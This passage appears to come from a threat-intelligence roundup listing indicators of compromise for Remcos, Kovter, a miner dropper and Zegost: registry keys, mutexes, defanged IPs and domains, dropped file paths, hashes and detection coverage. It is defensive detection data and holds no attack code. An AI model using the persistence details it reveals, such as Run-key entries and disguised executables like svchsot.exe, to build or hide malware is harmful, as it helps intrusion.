'[a-f0-9]{3,5}'>_appcompat.txt` | 21 \n`%TEMP%\\<random, matching '[A-F0-9]{4,5}'>.dmp` | 21 \n`%TEMP%\\bna1.tmp` | 2 \n`%TEMP%\\fpa1.tmp` | 2 \n`%TEMP%\\edb242D.tmp` | 1 \n`%TEMP%\\ldb2574.tmp` | 1 \n`%TEMP%\\spb9CB6.tmp` | 1 \n`%TEMP%\\ceb291C.tmp` | 1 \n`%TEMP%\\ddb2324.tmp` | 1 \n`%TEMP%\\rpb98B0.tmp` | 1 \n`%TEMP%\\npb9788.tmp` | 1 \n`%TEMP%\\txbEAC6.tmp` | 1 \n`%TEMP%\\upb96CD.tmp` | 1 \n`%TEMP%\\hob9547.tmp` | 1 \n`%TEMP%\\opb9A94.tmp` | 1 \n`%TEMP%\\mhb4D7E.tmp` | 1 \n`%TEMP%\\feb2832.tmp` | 1 \n`%TEMP%\\lrbB277.tmp` | 1 \n`%TEMP%\\veb29D8.tmp` | 1 \n`%TEMP%\\ngb3F89.tmp` | 1 \n`%TEMP%\\apb9602.tmp` | 1 \n`%TEMP%\\vgb41DA.tmp` | 1 \n`%TEMP%\\ogb4093.tmp` | 1 \n`%TEMP%\\qgb3FA9.tmp` | 1 \n`%TEMP%\\hgb4257.tmp` | 1 \n \n*See JSON for more IOCs\n\n#### File Hashes\n\n` 0de64a980bd8ba77c2d6f216bac219376a5981e3e3bca7fb7797d8658e0af56f 1a949bb288102e17fc51645e7cbf098ccdaa3fb5414d2874f454b67133cfeff6 1ac60ed1f894fc3758748ba428554b91253af824d56972e3af76f3b4932d75f8 2571f483b3363c6f4e31b5fe674958ecd78f10c82211b56e3a3da07175404f5c 2f59cc275a2306af4c0c22aabbb672fe316358b105b8aa1d1df9e34e8b8141ba 32438083d79ac23f89bc2f96befd073ca3f4a30f831aa85dcded3f0e6bde168a 363ba569063f98eed6553089dd75c19d8f87f8adc171a4c707f6e4158cd0b37c 3ce4b7ade0171971c2c8106b9b58fa5432e8feba8d10b80f2a82f87511eb4a84 3efcc75fac41f6a3f8cf626753c72f6df00ff8617640989bfc67f284a6782eab 42dcaf24b47e158c5bde0bf37aca7494cf4a318203205fd44d8a957fb4a54965 47be4b0e8768289addb59602b024887db8c8ebca026bc054eb1d03f6602e09b7 4d6b7067ff55b4e5025f0713aa0f93328ca500444f5c52c4b84993d0c00a3675 5386a3f5dfa37f454ce6ea8aba622cdea0e1a6e7bfee4b34c3235eeb6ca7c21d 5e5e207352827e19880e32e481281ae32a895bfa47af7702cbeb49f6a90404a6 66da22fd2c8d82e6267c6b21d03dd20f1fb9f242170f4a3c2b0e05b337a1080c 919864b47bbb9dc802df79a974f0a119e79e4ddab76c01cf79071d9a4866c8df 9220f5a71a621ac56ab75aef023d15fedf18fe40dd094a2409a1586712b929b0 949add118d6e884685a78104077991d8cff1a0b9b28e8359d551ab4b698b3af8 9ceee0623cb6c2c1f94b4cb90b2a0cfb6a07e203e3d901b8c5a2cfcba34d46ca 9d60933316a5def1ddf71e9dddbcd48b2b2f5cd711cc7dd1ce1354655dbcd2a9 bd8d558604fc04fde215abf52ed73ecde6a7f97bfd48f9540b8dc823054525a8 c07b02bff8ebaa27f5da40de8c92ba78c2f9a1d3c76dee6c4f76596594d68f0f c71ced95ef06e91dd6083a21bfae4bcf5696ba91d5b7c25b1ce62e2fbc58450c cf0face1fb821f4ce1944f65549e242b1b033e7525921c3e24d027dd4efbcaa6 ea873fa6d0bad68c2f2c52949a2eb10aadf140ad0cf5b5b753819a1063a14fbb `\n\n*See JSON for more IOCs\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAmp |  \nCloudlock | N/A \nCws |  \nEmail Security |  \nNetwork Security | N/A \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella | N/A \nWsa | N/A \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-5OIquQni3Tc/XUREW1tDmaI/AAAAAAAAB5k/mgOvZoV1OxUUducbCoQjJEAzYbcV9eQwwCLcBGAs/s1600/42dcaf24b47e158c5bde0bf37aca7494cf4a318203205fd44d8a957fb4a54965_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-Oo_A84lo6jI/XUREdFEafrI/AAAAAAAAB5s/H2CIxZ4cZyM13kFAs0y4Hokyp_ITEeuFACLcBGAs/s1600/42dcaf24b47e158c5bde0bf37aca7494cf4a318203205fd44d8a957fb4a54965_tg.png>)\n\n \n\n\n* * *\n\n### Win.Malware.Remcos-7089920-1\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKCU>\\Software\\Microsoft\\Windows Script Host\\Settings ` | 22 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: task ` | 22 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: task ` | 22 \n`<HKCU>\\Software\\Remcos-F5NWKC ` | 14 \n`<HKCU>\\SOFTWARE\\REMCOS-F5NWKC \nValue Name: exepath ` | 14 \n`<HKCU>\\SOFTWARE\\REMCOS-F5NWKC \nValue Name: licence ` | 14 \n`<HKCU>\\Software\\Remcos-FNLRTG ` | 6 \n`<HKCU>\\SOFTWARE\\REMCOS-FNLRTG \nValue Name: exepath ` | 6 \n`<HKCU>\\SOFTWARE\\REMCOS-FNLRTG \nValue Name: licence ` | 6 \nMutexes | Occurrences \n---|--- \n`Remcos_Mutex_Inj` | 22 \n`Remcos-F5NWKC` | 16 \n`Remcos-FNLRTG` | 6 \n`Global\\82814f21-b3c0-11e9-a007-00501e3ae7b5` | 5 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`192[.]69[.]169[.]25` | 14 \n`179[.]33[.]146[.]222` | 6 \n`172[.]217[.]7[.]238` | 1 \nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`abeasinf[.]duckdns[.]org` | 14 \n`remsalvados2019[.]duckdns[.]org` | 6 \nFiles and or directories created | Occurrences \n---|--- \n`%TEMP%\\install.vbs` | 22 \n`%APPDATA%\\remcos` | 20 \n`%APPDATA%\\remcos\\logs.dat` | 20 \n`%APPDATA%\\System32` | 16 \n`%APPDATA%\\System32\\task.exe` | 16 \n`%APPDATA%\\explored` | 6 \n`%APPDATA%\\explored\\task.exe` | 6 \n \n#### File Hashes\n\n` 07e4832ad064b83345dc65d845c656acb036d1ba416aeba93ea1e5e455e5d93f 0e4ef97aaa97a61adfcbcc801ae9bf1554aff454f17ecc1c12ae1b78de63a82f 0f73749d1f1275074b813d85df5da536242a5dd841df5e6beccda497da11c688 2428324467859f295b59fa94ae4a2d46383e727ecde439b9ae8a98ee3a058c82 33b9073da941fe67d1c2d6ac3db931a12dd16eff3e40614d142ba9f20a2f6cfa 40ddc409d3c26b0d6718b9933242c6c8a317d82626f2b5657b6d53ca1e94f8b9 4eb7eb5ff66633577f584e08638eddb1f175295dc6f140e4daaa499503c7903d 53d5a95234af1e094671269c8de5e54675495a7d6ff7d00736ebc9c5d7f9233e 603b1c659c004167578170b44c3b953eeed7caf47dcf878cde6a085e096b2d0a 615d24c911f1a5f99250f0b16003d1a52f22f9f9e3560863f542f624132239b0 637f60b9ca2e20c192e3c9758972477cf4389a0e6b86d2e68e3712855eaf5bf4 6cc16b02084076c656e304e81712f27f8813d7b97b8851517946a7e2cc933d31 6f54f3d6d8c7f4487e56368ee015c1d4fbc00bc77bdc76b45d14530ca28980ef 7a1fbd0098df288e866f3cc6cad071a616fe4916f5f489d6ddda5bc077c7bbdd 868dc90c4bbc89a2b21cea9d234e4189578b6c3beeb590126ae6ae949f62eaf4 8ee5bda36b3104b33ac8f5e8b8ac9828717e27bc8a66a8bd24a85f01bf84a95f 8f9a5246320b31ca9e48b8e8ff53918705d311a8afd6dd144797166751a6d469 9a8e4530aa2a8aaad91f72014d2b2878f557c3e424fc4f0b9ff3e6768f8fe912 9b38f1d468eb8b5accb360d34de2e6522e23c0b07a8b64fc7b42b2ffd4cb5d52 9bd3531c471b33207020377534b3bd9bbf5ea46a0a20006952b8627ff400fc51 a03f12df245983e127285885886bbe98377cafb7bbcd11e26bf0b8841ff991e9 a13e9d6bd38f8579d6bb06fb51be5354fd3e7704adf159817499d1bc536091a1 a98a627f7eeeba6267037bab8ad15c6443547a1d1fcd148d6a7934ffa6e1062e acc90634c7b0d8ebb28d8763c5395eb4b715a66b0caf2b299921be3b7fd3593d b06c46bcb19243e30ed996e2af8ba284f413863bc57402345bc09b5e42389ceb `\n\n*See JSON for more IOCs\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAmp |  \nCloudlock | N/A \nCws |  \nEmail Security |  \nNetwork Security |  \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella | N/A \nWsa |  \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-thT-pcUBWcg/XUREm_ltKQI/AAAAAAAAB50/Cmxva5n-PmE4GUaZxZRmx25b8_rxEGjBQCLcBGAs/s1600/9b38f1d468eb8b5accb360d34de2e6522e23c0b07a8b64fc7b42b2ffd4cb5d52_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-yNNkbQreVXg/XURErr17JOI/AAAAAAAAB54/w5ccfeVvSzIBMUXioi8tt4lA-uYKjulxwCLcBGAs/s1600/9b38f1d468eb8b5accb360d34de2e6522e23c0b07a8b64fc7b42b2ffd4cb5d52_tg.png>)\n\n \n\n\n* * *\n\n### Win.Dropper.Kovter-7086582-0\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run ` | 25 \n`<HKCU>\\SOFTWARE\\3a91c13ab1 ` | 25 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\3a91c13ab1 ` | 25 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\3A91C13AB1 \nValue Name: 656f27d6 ` | 25 \n`<HKCU>\\SOFTWARE\\3A91C13AB1 \nValue Name: 656f27d6 ` | 25 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\3A91C13AB1 \nValue Name: 96f717b3 ` | 25 \n`<HKCU>\\SOFTWARE\\3A91C13AB1 \nValue Name: 96f717b3 ` | 25 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\3A91C13AB1 \nValue Name: 01b2a448 ` | 23 \n`<HKCU>\\SOFTWARE\\3A91C13AB1 \nValue Name: 01b2a448 ` | 23 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\AUTHROOT\\CERTIFICATES\\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 \nValue Name: Blob ` | 3 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\5F287F4F75829A94 ` | 1 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\zT1Dki ` | 1 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\5F287F4F75829A94 \nValue Name: 016CFBC1BABEFF10 ` | 1 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\ZT1DKI \nValue Name: CpYrHqV ` | 1 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\ZT1DKI \nValue Name: 39WZL4 ` | 1 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\90ED0D761B2FB199A ` | 1 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\olRmhsU ` | 1 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\90ED0D761B2FB199A \nValue Name: 7A09ED122AF4ECD0E83 ` | 1 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\OLRMHSU \nValue Name: vsctEaBx ` | 1 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\OLRMHSU \nValue Name: 80de8Ae ` | 1 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\C9E39C761A77CAC1DC ` | 1 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\l0CEbsVa ` | 1 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\C9E39C761A77CAC1DC \nValue Name: E6D1B26BEF7541793FF1 ` | 1 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\L0CEBSVA \nValue Name: rSCO76J ` | 1 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\L0CEBSVA \nValue Name: PY7gGpGla ` | 1 \nMutexes | Occurrences \n---|--- \n`EA4EC370D1E573DA` | 25 \n`A83BAA13F950654C` | 25 \n`Global\\7A7146875A8CDE1E` | 25 \n`B3E8F6F86CDD9D8B` | 25 \n`\\BaseNamedObjects\\408D8D94EC4F66FC` | 25 \n`\\BaseNamedObjects\\Global\\350160F4882D1C98` | 25 \n`\\BaseNamedObjects\\053C7D611BC8DF3A` | 25 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`157[.]249[.]130[.]189` | 1 \n`112[.]51[.]201[.]117` | 1 \n`53[.]61[.]24[.]171` | 1 \n`119[.]97[.]239[.]35` | 1 \n`188[.]236[.]23[.]197` | 1 \n`1[.]165[.]149[.]97` | 1 \n`27[.]173[.]241[.]96` | 1 \n`147[.]117[.]235[.]220` | 1 \n`26[.]218[.]146[.]92` | 1 \n`209[.]73[.]97[.]109` | 1 \n`139[.]121[.]49[.]82` | 1 \n`119[.]149[.]159[.]187` | 1 \n`191[.]184[.]185[.]179` | 1 \n`6[.]40[.]66[.]225` | 1 \n`112[.]117[.]175[.]94` | 1 \n`172[.]43[.]49[.]44` | 1 \n`6[.]214[.]160[.]88` | 1 \n`28[.]29[.]189[.]12` | 1 \n`60[.]97[.]36[.]141` | 1 \n`99[.]24[.]117[.]121` | 1 \n`192[.]242[.]171[.]82` | 1 \n`74[.]101[.]122[.]65` | 1 \n`5[.]107[.]225[.]199` | 1 \n`165[.]64[.]226[.]220` | 1 \n`109[.]209[.]166[.]138` | 1 \n \n*See JSON for more IOCs\n\nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`A` | 25 \n`api[.]w[.]org` | 1 \n`home[.]pl` | 1 \n`php[.]net` | 1 \n`www[.]interworx[.]com` | 1 \n`www[.]openssl[.]org` | 1 \n`apache[.]org` | 1 \n`lod[.]is` | 1 \n`dev[.]allsystemsgomt[.]com` | 1 \n`allsystemsgomt[.]com` | 1 \n`allsystemsgocomputer[.]business[.]site` | 1 \nFiles and or directories created | Occurrences \n---|--- \n`1.txt` | 25 \n \n#### File Hashes\n\n` 0c308626f38e758cdb362c216e98b86754423ee8a7db0c6cdc73e9aaacbfbd57 158542e3697bb1d467a68b50035950a6eee3f4cdf4a87ef35ec280f092aa8f24 179bfcba0795d5b8c53cd381a3bd5272b0ba170cb76312263f7cf7fa9801950b 17f14b4856e5f4919f908400d8789cc8388381989d4f1333ec6c70346c8d78d3 1c6937a286b18f016d6687ba872b0d19cf99932f523b8c9b98e5203dce8636b3 246b9a16823df5dce07e6435afd691833a4056b87c51cfa8812b82c156063426 2a10ba74892b50cfe9338482c758d0eff0f62c2cf5e5750c05779d9c67381bd5 4839855b43c168a5f5a92266906c8b070cc65d496e0f37978b6f34eae30327b2 48dccfab3d58e5370ddd4481768e7f66fe259364367c7ae40a45ed74ef67323a 4e78f30bb53f103efa2923359348c48d1cff85fb481ee60c70fb7937f44d6f0d 4f9607712eaad7066f27a05e427dc18661cb6f4847d59027ae1ef20400975a9f 4fda5660b594ab93dfac2a37a0bb114b8d68fc51334431f3d1c1ddb982dd6446 500fd828118c21813966513f5fd4d0badebae33e7b8280a95a8924a4a5eebba1 59ac65640ef6b7d2236b869ad56315567652eaa87c9161ec001950b00ca98608 60bd60bdf77e61d2acbf4980229ae21a2ac24ea381f58ca5cbc1d67fc1ed6775 62fdea9bdc0d4ed1f1c05f333af859f548e1442eaacbdac8645750694d4e575d 7148d96630544e09b466bddc4a8ac60eeadc05af9afb4dbc85a8621a93400c18 7a21fa88108ed9456d3a462c9c57487c8def488728995b2a858d13641465df5d 7d07b0f68bd1873e5372cc79d7e24e4d2c70d5fdc55ad01aff968c42a428d484 866c5a060cf8f44209a39d358ec0c6a872317f3957f08609b1817774eabce57f 8e08a03289e73d0bf196fcb4f36a16ab547f9eb4ef6f38ff20fa70d898871ee0 9acb88217e012f43bdfa085b062c5da48ab5dd5ed888be77f9617a1ba2400c93 a89ace7661f6189a698955d46e97ebe3da70a308e25a4b7862c5dde9b3d4776c afb3a3ca5db5736154aabfc6e86bd31b7c0fb725fdc67eb42a02e0e211f9831c b092d2e89c04741e1d5150767a0e79a49e6edb05a142ccb7a971373c2abb3ae8 `\n\n*See JSON for more IOCs\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAmp |  \nCloudlock | N/A \nCws |  \nEmail Security |  \nNetwork Security | N/A \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella | N/A \nWsa | N/A \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-o34qMZeyPt0/XUREzY-N5rI/AAAAAAAAB58/K6qHa7fPO2s6pBctlYFhhBUiw5oAkSo6ACLcBGAs/s1600/246b9a16823df5dce07e6435afd691833a4056b87c51cfa8812b82c156063426_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-q20I_iz9jOk/XURE4RjotAI/AAAAAAAAB6E/pE7q6UzjzfEs5TK--wg675yzwdVyYUUSQCLcBGAs/s1600/246b9a16823df5dce07e6435afd691833a4056b87c51cfa8812b82c156063426_tg.png>)\n\n \n\n\n* * *\n\n### Win.Dropper.Miner-7086571-0\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKLM>\\Software\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\Compatibility Assistant\\Quarantined ` | 21 \n`<HKLM>\\Software\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\Compatibility Assistant\\Monitored ` | 21 \n`<HKCU>\\Software\\OCS ` | 21 \n`<HKCU>\\SOFTWARE\\OCS \nValue Name: CID ` | 21 \n`<HKCU>\\SOFTWARE\\OCS \nValue Name: PID ` | 21 \n`<HKCU>\\SOFTWARE\\OCS \nValue Name: lastPID ` | 21 \n`<HKCU>\\SOFTWARE\\OCS \nValue Name: lastSID ` | 19 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\AUTHROOT\\CERTIFICATES\\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 \nValue Name: Blob ` | 2 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\AUTHROOT\\CERTIFICATES\\75E0ABB6138512271C04F85FDDDE38E4B7242EFE \nValue Name: Blob ` | 2 \nMutexes | Occurrences \n---|--- \n`Local\\https://www.chip.de/` | 2 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`23[.]13[.]208[.]26` | 17 \n`91[.]199[.]212[.]52` | 11 \n`176[.]9[.]97[.]244` | 11 \n`5[.]9[.]198[.]83` | 10 \n`5[.]9[.]176[.]3` | 10 \n`5[.]9[.]116[.]27` | 6 \n`5[.]9[.]175[.]19` | 4 \n`204[.]79[.]197[.]200` | 2 \n`172[.]217[.]12[.]198` | 2 \n`54[.]210[.]244[.]131` | 2 \n`64[.]202[.]112[.]63` | 2 \n`23[.]6[.]70[.]227` | 2 \n`13[.]107[.]21[.]200` | 1 \n`151[.]101[.]2[.]2` | 1 \n`151[.]101[.]66[.]2` | 1 \n`173[.]223[.]56[.]52` | 1 \n`173[.]223[.]236[.]173` | 1 \n`96[.]6[.]22[.]211` | 1 \n`96[.]6[.]29[.]52` | 1 \n`64[.]202[.]112[.]31` | 1 \n`70[.]42[.]32[.]31` | 1 \n`23[.]32[.]81[.]249` | 1 \n`23[.]41[.]180[.]26` | 1 \n`35[.]158[.]10[.]18` | 1 \n`104[.]121[.]102[.]142` | 1 \n \n*See JSON for more IOCs\n\nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`api[.]chip-secured-download[.]de` | 21 \n`e3056[.]dscg[.]akamaiedge[.]net` | 12 \n`www[.]chip[.]de` | 12 \n`ocs3[.]chdi-server[.]de` | 10 \n`ocs2[.]chdi-server[.]de` | 6 \n`crt[.]usertrust[.]com` | 5 \n`ocs1[.]chdi-server[.]de` | 4 \n`schema[.]org` | 2 \n`ad[.]doubleclick[.]net` | 2 \n`odb[.]outbrain[.]com` | 2 \n`tcheck[.]outbrainimg[.]com` | 2 \n`log[.]outbrainimg[.]com` | 2 \n`widgets[.]outbrain[.]com` | 2 \n`mcdp-nydc1[.]outbrain[.]com` | 2 \n`efahrer[.]chip[.]de` | 2 \n`gutscheine[.]chip[.]de` | 2 \n`services[.]chip[.]de` | 2 \n`www[.]summerhamster[.]com` | 2 \n`filestorage[.]chip[.]de` | 2 \n`apps[.]chip[.]de` | 2 \n`search[.]chip[.]de` | 2 \n`mms[.]chip[.]de` | 2 \n`www[.]interred[.]de` | 2 \n`www[.]chip-kiosk[.]de` | 2 \n`chip[.]info` | 2 \n \n*See JSON for more IOCs\n\nFiles and or directories created | Occurrences \n---|--- \n`%TEMP%\\DMR` | 21 \n`%TEMP%\\DMR\\dmr_72.exe` | 21 \n`%HOMEPATH%\\NTUSER.DAT` | 21 \n`%HOMEPATH%\\ntuser.dat.LOG1` | 21 \n`%APPDATA%\\Microsoft\\CryptnetUrlCache\\Content\\E0968A1E3A40D2582E7FD463BAEB59CD` | 20 \n`%APPDATA%\\Microsoft\\CryptnetUrlCache\\MetaData\\E0968A1E3A40D2582E7FD463BAEB59CD` | 20 \n`\\REGISTRY\\MACHINE\\SOFTWARE\\Classes\\CLSID\\{D5E8041D-920F-45e9-B8FB-B1DEB82C6E5E}\\LocalServer32` | 1 \n`%TEMP%\\DMR\\ishnuwkqraonlvar.dat` | 1 \n`%TEMP%\\DMR\\usbxlrosrdztgwpi.dat` | 1 \n`%TEMP%\\DMR\\seysuwrfdtqhnrpj.dat` | 1 \n`%TEMP%\\DMR\\xglpmhfhfspocakr.dat` | 1 \n`%TEMP%\\DMR\\lbhlcyuzmtpetsxw.dat` | 1 \n`%TEMP%\\DMR\\gwlwmrciqqkeyeks.dat` | 1 \n`%TEMP%\\DMR\\ymbcvbzrdalmdftj.dat` | 1 \n`%TEMP%\\DMR\\hpiylxvkyztuheei.dat` | 1 \n`%TEMP%\\DMR\\dpnpigfwacztjuns.dat` | 1 \n`%TEMP%\\DMR\\spvazpzpxhusfvjq.dat` | 1 \n`%TEMP%\\DMR\\fhandfasizfmozvg.dat` | 1 \n`%TEMP%\\DMR\\nvdvdyywkouvxaym.dat` | 1 \n`%TEMP%\\DMR\\puzhauckewbevmtx.dat` | 1 \n`%TEMP%\\DMR\\bacuhsidwpicjayv.dat` | 1 \n`%TEMP%\\DMR\\vjjeolwfjjggtcev.dat` | 1 \n`%TEMP%\\DMR\\sfmbwidykwqvqawj.dat` | 1 \n`%TEMP%\\DMR\\fnoohkjzniiixfov.dat` | 1 \n`%TEMP%\\DMR\\mygfrlcodocysopx.dat` | 1 \n \n*See JSON for more IOCs\n\n#### File Hashes\n\n` 4f14400c7865d769d6c4328464b49cc4e179124a00a423204356285846a0b07f 666a1635a2d0fb5cbc4af2749198f4c0fe57bdb27e3f5b60ea194081b2a373b1 68371d415a84102cc9c42fce2e2b434e984a7cd6824cd6d25c33496b4b779cd8 6e6043d7c25d2c717bbecd32b9fdd60291e2012d2df692319c1b76894c9e88b4 6fef1f8672b5c19972babe4f533dd84964ba67dcea8013545a1756150a043f02 701c053066142c8ce92f00a1739c7c7fee19165799067a1478e2d2f4b0660300 756c99bdbf516b88d69aecafd94b81d338718364fed4a66e0e7430f5070fe4d3 7cc3b82e8ea40284061707c6918eb30b94c2d153bdad7ebcea40fb74269e800d 8f86d8033e08b367c9577f9c1d5f0f67f914687607720a627ce4467d855acb31 95f954c65d2f3f44015ba04d3bd95b2c14eb25702549c2ec46402a79caf5bf4b 9849abcf225ff91f2b50db88c8330f27477f753c1062980ad3a61e66729b9319 992778f2fb834d928bdc56df4d782f841475183e2cd156b153e6f5fe5b5cfa70 9b833124a43f9edd8482da692534ae3165026eeb0885f0a426da434993661d4d a0ae34105095f8e498f5ef7fa3a2c70c1fca7d0463453114d8e6fcb1400cf4b7 aa032e4e646aed28148b54ffab1671aeabf99d6695341c273d6b20921092cb3a bde0eefd7fd333518f0d29c8e4e82d635c77f2511eaaafc8cd38b1cc185fe423 ddb185cb305a9c0ab7feedbc74b5c1e8403c8949f8eceb816c2bc27bdd363e18 e0d5e5618ae25a2f13cdb593db3e51e6fb92cb63518c3416b4d122d8a82fc284 e12019286976d31196602d1c653f984ed376d6a18bddfda61b7cff437b4aaab7 ee7740f172da0a36060ba569cab938764d6646d82473b35bc05361e9bbc16f24 f2fb2e8f9f7826463ba3ca722fe33bf9c7525f4cb6f69d5d248843542de16da3 `\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAmp |  \nCloudlock | N/A \nCws |  \nEmail Security |  \nNetwork Security |  \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella | N/A \nWsa |  \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-S-sYNmqBhwU/XURFBImcEyI/AAAAAAAAB6M/_hch7QgtQwIvNFNaSJzLLBOQHq1lcrtjQCLcBGAs/s1600/ddb185cb305a9c0ab7feedbc74b5c1e8403c8949f8eceb816c2bc27bdd363e18_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-dOdZlABQ9k8/XURFFVIODII/AAAAAAAAB6U/hYLUYg5qC4MfcVL8eLHpmIjY1mkeHjo7QCLcBGAs/s1600/ddb185cb305a9c0ab7feedbc74b5c1e8403c8949f8eceb816c2bc27bdd363e18_tg.png>)\n\n \n\n\n* * *\n\n### Win.Trojan.Zegost-7086512-0\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKLM>\\Software\\Wow6432Node\\Microsoft\\DownloadManager ` | 12 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: XXXXXX579E5A5B VVVVVVrr2unw== ` | 11 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: XXXXXX2CD24958 ` | 1 \nMutexes | Occurrences \n---|--- \n`AAAAAA9PT0vfT4rqenp70A/Pqpp6+vr58= BBBBBB9PT0vf4Fr7K0sr0A/Pqpp6+vr58= CCCCCC9PT0vQXpr7K0sr0A/Pqpp6+vr58= GGGGGG4wIF/vL7858= XXXXXX579E5A5B VVVVVVrr2unw==` | 11 \n`AAAAAA8fjz+gD9A66xsL0A/AP98L0A/PqpprOwnw==` | 1 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`107[.]165[.]236[.]233` | 11 \n`154[.]90[.]68[.]52` | 11 \n`50[.]63[.]202[.]88` | 5 \n`50[.]63[.]202[.]70` | 4 \n`184[.]168[.]221[.]73` | 3 \n`184[.]168[.]221[.]85` | 2 \n`184[.]168[.]221[.]74` | 2 \n`50[.]63[.]202[.]73` | 1 \n`45[.]39[.]189[.]31` | 1 \nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`bjerfogxz[.]ddns[.]net` | 12 \n`www[.]af0575[.]com` | 11 \n`www[.]fz0575[.]com` | 11 \n`www[.]wk1888[.]com` | 11 \n`af0575[.]com` | 7 \n`rktmcnd123[.]codns[.]com` | 1 \nFiles and or directories created | Occurrences \n---|--- \n`%SystemRoot%\\XXXXXX579E5A5B VVVVVVrr2unw==` | 11 \n`%SystemRoot%\\XXXXXX579E5A5B VVVVVVrr2unw==\\svchsot.exe` | 11 \n`%SystemRoot%\\XXXXXX2CD24958` | 1 \n`%SystemRoot%\\XXXXXX2CD24958\\svchsot.exe` | 1 \n \n#### File Hashes\n\n` 21ec5795c07ed8c65dced2ca73a94f870cde60947574a06861cdf199af788dfa 26c6a08b58e3d5ff4d67ff39198306c9e7f681876f0b2ebe66fed7bedbfb1aae 3a2e092cefd3fcb61f5411a0bd03fdeb9fa48cfa3f439522e2f2090b0d1b4035 3ca6404e74295a09db3747db63d04600915b772bba68e6c9a7ecca07f6175337 5458070fe2e706f6c0559fafaba2ee6cd2c57e3b9d578d3d6bef860e2f60683f 5f4af61b5e7f60cb4db4faf750fa148a4c019052e126c96ed9c6bed672e8a8dc 6db119c36ff19b5f8a288fe515fb3a20980495d36c071feca82d0e664567c78c 8b8a6a9551c89b8d7a561d25ac5ea0e3482ceff12fa48d15060d20e74957fb75 9702dbfb26ad6cebd6d223a2503e7a84cef55ee09e8db9a1201fa054dd81f913 bc46ec7de14d120876ae205f133864b3bb25a1514cc583479eec1a84bcd99b39 fc08509806bfbd4142b38782f2b397604e8c9cbde369c5384531b384635a57a1 fe6d46a51cc7b1b7330c81c2c513cf152a74d69c46e3266bcc7f9ad126ba3b78 `\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAmp |  \nCloudlock | N/A \nCws |  \nEmail Security |  \nNetwork Security |  \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella |  \nWsa |  \n \n#### Screenshots of Detection\n\n#### 